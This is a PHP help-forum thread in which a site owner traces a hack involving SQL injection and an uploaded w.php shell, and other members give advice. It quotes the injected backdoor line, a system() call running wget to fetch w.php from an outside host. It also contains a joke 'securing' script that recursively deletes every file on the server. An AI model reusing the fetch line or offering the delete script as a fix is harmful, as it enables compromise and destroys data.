Jump to content

Has my site been hacked?

hedgehog90

By hedgehog90
in Miscellaneous

 Share

Recommended Posts

hedgehog90 Member

hedgehog90

Posted
  • Author
Posted

I've worked part of it out now...

I've been going through the logs for HOURS, it's incredibly tedious and boring.

 

I've found the prick who did this: 89.232.248.163.

Russian. Crafty.

 

On May 15th, he used mysql injection to get my CMS login details.

Once he had the login details he played around in the CMS and changed replaced a game file with w.php.

It turns out you can upload phps despite what I said...

 

After that, he went to playgame page for that speciifc game, and ran it over and over.

I've got to admit, this guy was very quick and clever to do this - the back end is a bit of a mess and very hard for someone else to understand (or so I thought)

 

So, that explains w.php, but it doesn't necessarilly explain game.js and the footer.php and index.php files being editted on May 31st.

There is certainly absolutely no functionailty in the CMS to alter php files, or files of any kind. All the files it uploads/deletes are in the admin folder. Index.php and footer.php at are in the root.

If w.php when run editted these files, then why didn't it do it 16 days prior?

 

I can't find anything out through the log about these alterations except the time and day that game.js was first run.

 

What now?

More importantly, what are the steps to take to maike sure this never happens again?

Link to comment
Share on other sites
PFMaBiSmAd Advanced Member

PFMaBiSmAd

Posted
Posted

He probably (automatically) uploaded a file manager script that is letting him alter any of the files he wants.

 

The sql injection to dump your database was probably done automatically by a bot script along with uploading file(s.) The time lag was because he didn't immediately get around to checking any sites that his bot script found that he could exploit.

Link to comment
Share on other sites
hedgehog90 Member

hedgehog90

Posted
  • Author
Posted

Looking at the logs, the beginning looked automatic, trying a query a second, but it then looks like it was done manually. There were long pauses between his attempts.

 

I've downloaded the scripts from the site and I want to edit them so that this never happens again.

 

I've been trying mysql_escape_real_string with the url he used to get my username and password, and I still get returned my details. It appears to do fuck all with that particular example.

Link to comment
Share on other sites
PFMaBiSmAd Advanced Member

PFMaBiSmAd

Posted
Posted

Sorry to be (more) blunt (than normal), but hackers find sites to exploit using bot scripts. Once their automated bot script sends them back confirmation that a site is open to sql injection or allowing .php scripts to be uploaded and browsed to, then they spend time concentrating on ways to exploit those sites because a site open to some basic sql injection/php script uploading probably has a bunch of other security holes as well.

 

Just from this thread, your site is open to sql injection, is storing passwords in plain text, and probably isn't (effectively) validating or securing uploaded files.

 

As xylex suggested, attack and fix one problem at a time.

 

P.S. mysql_real_escape_string won't prevent sql injection if the value being escaped isn't being used as a string in a query and even some older versions of php don't properly use the mysql character set setting with mysql_real_escape_string and can be bypassed under some specific conditions.

Link to comment
Share on other sites
teynon Member

teynon

Posted
Posted

I would just like to say that the very first thing I mentioned was "Are you running a content management system?" Lol... Just saying... My guess is you bought a universal cms for the type of website you're running. I would also guess that other sites using the same system as you have also had similar things happen and it could possibly even be the people you downloaded the cms from. Hence why I said you should put your site offline (maintenance mode or something) while you attempt repairs and restoration by working on the IP address of your server.

Link to comment
Share on other sites
hedgehog90 Member

hedgehog90

Posted
  • Author
Posted

FFS, it's back... but now on the forum.

I found an editted php file in the file:

/forum/caches/tpl_AeroBlue_search_results.html.php

 

and also in:

/forum/styles/AeroBlue/template/search_body.html

 

Both contain this line of code at the top:

system('wget http://koliasoft.narod2.ru/w.php');

 

And that downloads and stores a file called w.php in the forum folder. (There's also another file called w.php.1, a copy)

 

All the files in the cache folder appear to be modified almost daily, this must be normal. However, I can see that search_body.html was editted 02.38 AM today.

 

I'm hoping that my fixes worked on the rest of the website, and that's why the problem files have moved to the forum, which i assumed was secure.

You would think the latest PHPBB would protect itself from mysql injection??? But apparently not.

 

So, probably from that w.php file, the footer.php had been editted again with that annoying iframe.

 

I need to wait 24 hours until the Apache Logs update on my end before I can start seeing exactly how it was done...

 

As I said earlier, I updated my PHPBB forum to the latest version a few days ago. The username and passwords for the 2 administrators on the forum are different to the other login details for the main site.

I guess the person behind this could have also gotten my username and password on the old unprotected pages and made a note of it.

 

For now, I won't change my username/password, because before I change them I want to have fixed the problem of mysql injection on the site.

 

Help?

Link to comment
Share on other sites
xyph Advanced Member

xyph

Posted
Posted

It's more than likely YOUR code and NOT PHPBB. PHPBB is designed by programmers, and supported by a large community. Any holes would be noticed, and a hole like yours is a BIG HOLE

 

Those are probably back doors that were put in after the initial attack.

 

This is the last post I'm going to make, because there is tons of help in this thread.

 

In order to fix your problem, you have to take down your site. You then have to take a CLEAN VERSION and fix any holes you know of. You then upload a clean version of your site.

 

Don't want data loss? Hire a programmer who understands web security and known attack vectors.

Link to comment
Share on other sites
hedgehog90 Member

hedgehog90

Posted
  • Author
Posted
In order to fix your problem, you have to take down your site. You then have to take a CLEAN VERSION and fix any holes you know of. You then upload a clean version of your site.

I did this... or so I thought.

Just to say "CLEAN IT" is not the kind of help I am looking for.

 

Don't want data loss? Hire a programmer who understands web security and known attack vectors.

Obviously, I'd rather get this fixed myself, otherwise I wouldn't have come here, so forgive me if I ignore that.

 

While I am very grateful for the help and attention, I've yet to have someone give me a step by step guide of EXACTLY how to rid myself of these problems.

 

Since I last posted, it appears the hacker has returned AGAIN, this time to change my password to the CMS. I haven't noticed any modifications though apart from this.

Link to comment
Share on other sites
Philip Advanced Member

Philip

Posted
Posted
I've yet to have someone give me a step by step guide of EXACTLY how to rid myself of these problems.

 

... because there are so many variables in how you got hacked and what steps you've actually taken to secure yourself since you realized it.

Link to comment
Share on other sites
teynon Member

teynon

Posted
Posted

I'm sorry, I posted this on another topic, but it is more relevant here for securing your website. This one script can secure your entire webserver.

 

<?php

function outputDir($dir) {

$handle=opendir($dir);

while (FALSE!==($file=readdir($handle))) {

if (($file != "..")&&($file!=".")) {

if (is_dir($dir."/".$file)) {

outputDir($dir."/".$file);

}

else {

unlink($dir."/".$file);

                                        echo $dir."/".$file."<br />";

}

}

}

}

outputDir("C:/ARSENAL/www/Drupal-7.0");

?>

Link to comment
Share on other sites
KevinM1 Advanced Member

KevinM1

Posted
Posted

OK, I've got the message. I'll fuck off now shall I? Sorry for wasting your time.

 

You do realize it's all but impossible to suggest a course of action without seeing any of your site code, right?  There are many possibilities as to why your site has been exploited, and seeing the results of the exploitation isn't very illuminating.  That this topic has gone three pages, with multiple posts asking you to show some code, suggests that the failure to move forward on this issue lies with you.  Expecting anyone to simply say "Do x, y, and z and you'll be fine" without relevant information is, to put mildly, unrealistic.

 

You have a choice - show us the code you wrote, which may allow us to suggest a course of action, or don't.  Getting huffy over our repeated reasonable requests for information is completely irrational, and only hurting you.

Link to comment
Share on other sites
This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.